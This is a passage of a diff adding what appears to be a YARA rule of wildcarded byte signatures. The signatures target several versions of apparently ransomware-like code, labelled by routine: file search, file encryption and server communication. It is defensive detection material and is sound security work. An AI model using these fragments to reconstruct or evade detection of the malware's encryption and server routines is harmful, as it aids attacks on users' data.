+            24 ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
+            3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85
+            C0 0F 84 3F 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ??
+            75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 00 02 00 00 8D 8C 24 ?? ?? ?? ?? B8
+        }
+		$file_search_0_3_5a_2 = {
+            66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05
+            1B C0 83 D8 ?? 85 C0 0F 84 C1 01 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B
+            50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 82 01 00 00 8D 8C 24 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 43 01 00 00 8D 8C 24 ?? ?? ?? ?? 53 51 E8 0F FD FF FF 8D 94 24 ?? ?? ?? ??
+            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ED 00 00 00 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 8D 44 24 ?? 0F 84 79 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 78 00 00 00 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 59 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 3A 8D 7C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 2C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 1E 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 0C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 8D 4C 24 ?? 51 57 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 7D FC FF FF 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_2_6a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
+            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 1A 57 56
+            FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 89 7C 24 ?? 75 21 56 FF 15 ?? ?? ?? ?? 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ??
+            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 81 FF ?? ?? ?? ?? 77 D7 53 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ??
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B D7 83 E2 ?? BB ?? ?? ?? ?? 2B DA 89 8C 24
+        }
+		$encrypt_file_0_2_6a_2 = {
+            8B 8C 24 ?? ?? ?? ?? 03 FB 57 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 74 3C
+            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 55 56 FF 15 ?? ?? ?? ?? 85 C0 74 24 8B 44 24 ?? 3B 44 24 ?? 75 1A 53 8D 14 28 53 52
+            E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 0F 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 D5 00 00 00 8D 44 24 ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 57 53 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ??
+            56 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A ??
+            8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 57 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 8D
+            94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 0F 56 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05
+            ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 55 11 05 ?? ?? ?? ?? 01 3D ?? ?? ?? ?? 11 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_1 = {
+            53 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24
+            ?? ?? ?? ?? 8B D5 83 E2 ?? BF ?? ?? ?? ?? 2B FA 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 1C 2F 53 89 84 24 ?? ?? ??
+            ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 89 44 24 ?? 74 38 6A ?? 8D 4C 24 ?? 51 55 50 56 FF 15 ?? ?? ?? ??
+            85 C0 74 24 3B 6C 24 ?? 75 1E 57 57 8B 7C 24 ?? 8D 14 2F 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 75 0F
+            56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 0F 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ??
+            ?? ?? 52 53 55 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
+            6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF D7 6A ?? 8D 54 24 ?? 52 6A ?? 8D 44 24 ?? 50 56 FF D7 6A ?? 8D 4C 24 ?? 51 53 55 56
+            FF D7 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 8D 9B ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15
+            ?? ?? ?? ?? 85 C0 75 27 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? FF D7 83
+            C6 ?? 83 FE ?? 7C C0 A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ??
+            ?? ?? ?? ?? 8B 44 24 ?? 50 11 35 ?? ?? ?? ?? 01 1D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4
+            ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5B 5D 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_3_1 = {
+            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 94 24
+            ?? ?? ?? ?? 8B D3 83 E2 ?? BD ?? ?? ?? ?? 2B EA 89 84 24 ?? ?? ?? ?? 8D 04 2B 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
+            50 89 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D 44 24 ?? 50 53 57 56
+            FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 5C 24 ?? 75 1E
+            55 8D 0C 1F 55 51 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? ?? ?? ?? 83 C4 ?? 56
+            FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5C 01 00 00 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ??
+            ?? 51 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A
+            ?? 8D 84 24 ?? ?? ?? ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 56 C7
+            44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75
+            1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AB 00 00 00 56 FF 15 ?? ?? ?? ?? 56 FF
+        }
+		$encrypt_file_0_3_3_2 = {
+            15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 49 ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75
+            2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE
+            ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ??
+            8B 44 24 ?? 57 11 35 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_4a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
+            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 19 5F 0B C0
+            5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 57 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 08 81 FB
+            ?? ?? ?? ?? 76 22 56 FF 15 ?? ?? ?? ?? 5B 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B
+            C3 83 E0 ?? BD ?? ?? ?? ?? 2B E8 8D 04 2B 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D
+            4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 99 01 00
+        }
+		$encrypt_file_0_3_4a_2 = {
+            00 3B 5C 24 ?? 75 1E 55 8D 14 1F 55 52 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5D 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
+            51 8D 94 24 ?? ?? ?? ?? 52 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A
+            ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 54 24 ?? 52 6A ??
+            8D 44 24 ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 54 24 ?? 6A ?? 8D 4C 24 ?? 51 52 53 56 C7 44 24 ?? ?? ??
+            ?? ?? FF D5 85 C0 75 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AC 00 00 00 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 64 24 ?? 8B 4C 24 ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 51 FF
+            15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_5a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 33 C0 55 56 57 33 FF 68 ?? ?? ?? ?? 89 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 8B F1 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 D2 00 00
+            00 57 56 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B8 00 00 00 3B EF 0F 84 B0 00 00 00 81 FD ?? ?? ?? ?? 0F 87 A4 00 00 00
+            8D 4F ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 8C 24 ??
+            ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B CD 83 E1 ?? BB ?? ?? ?? ?? 2B D9 89 84 24 ?? ?? ?? ?? 8D 04 2B 50
+            89 94 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 3B 6A ?? 8D 54 24 ?? 52 55 57 56 FF 15 ?? ?? ??
+            ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 6C 24 ?? 74 18 57 E8
+        }
+		$encrypt_file_0_3_5a_2 = {
+            83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 7A 01 00 00 53 8D 04 2F 53 50 E8 ?? ?? ?? ?? 8B 6C 24 ?? 83 C4 ?? 55 E8 ??
+            ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 C7 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50
+            55 57 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 6A ??
+            8D 94 24 ?? ?? ?? ?? 52 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 0F 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E9 5E FF FF FF 6A ??
+            8D 44 24 ?? 50 6A ?? 8D 4C 24 ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 D4 8B 44 24 ?? 6A ?? 8D 54 24 ?? 52 50 53
+            56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 B8 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 EB 09 8D
+            A4 24 ?? ?? ?? ?? 8B FF 8B 54 24 ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D
+            ?? ?? ?? ?? 75 0E 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ??
+            33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ??
+            ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24
+            ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$server_communication_0_2_6a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 00 53 33 DB 39 1D ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 53 50 88 5C 24 ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 53 89 44 24 ?? 89 44
+            24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ??
+            ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52
+            50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 70 ?? 8A 08 83 C0 ?? 3A CB 75
+            F7 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 2B C6 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83
+            C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 85 ?? ?? ?? ?? 51 53 52 FF 15
+        }
+		$server_communication_0_2_6a_2 = {
+            A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 51 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
+            53 53 53 8D 54 24 ?? 52 8B E8 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 53 50 88 9C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 56 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 C7 05 ?? ?? ?? ?? ??
+            ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? FF D6
+        }
+		$server_communication_0_3_1_1 = {
+            8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ??
+            ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ??
+            ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ??
+            8A 10 83 C0 ?? 3A D3 75 F7 55 56 57 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C
+            24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8
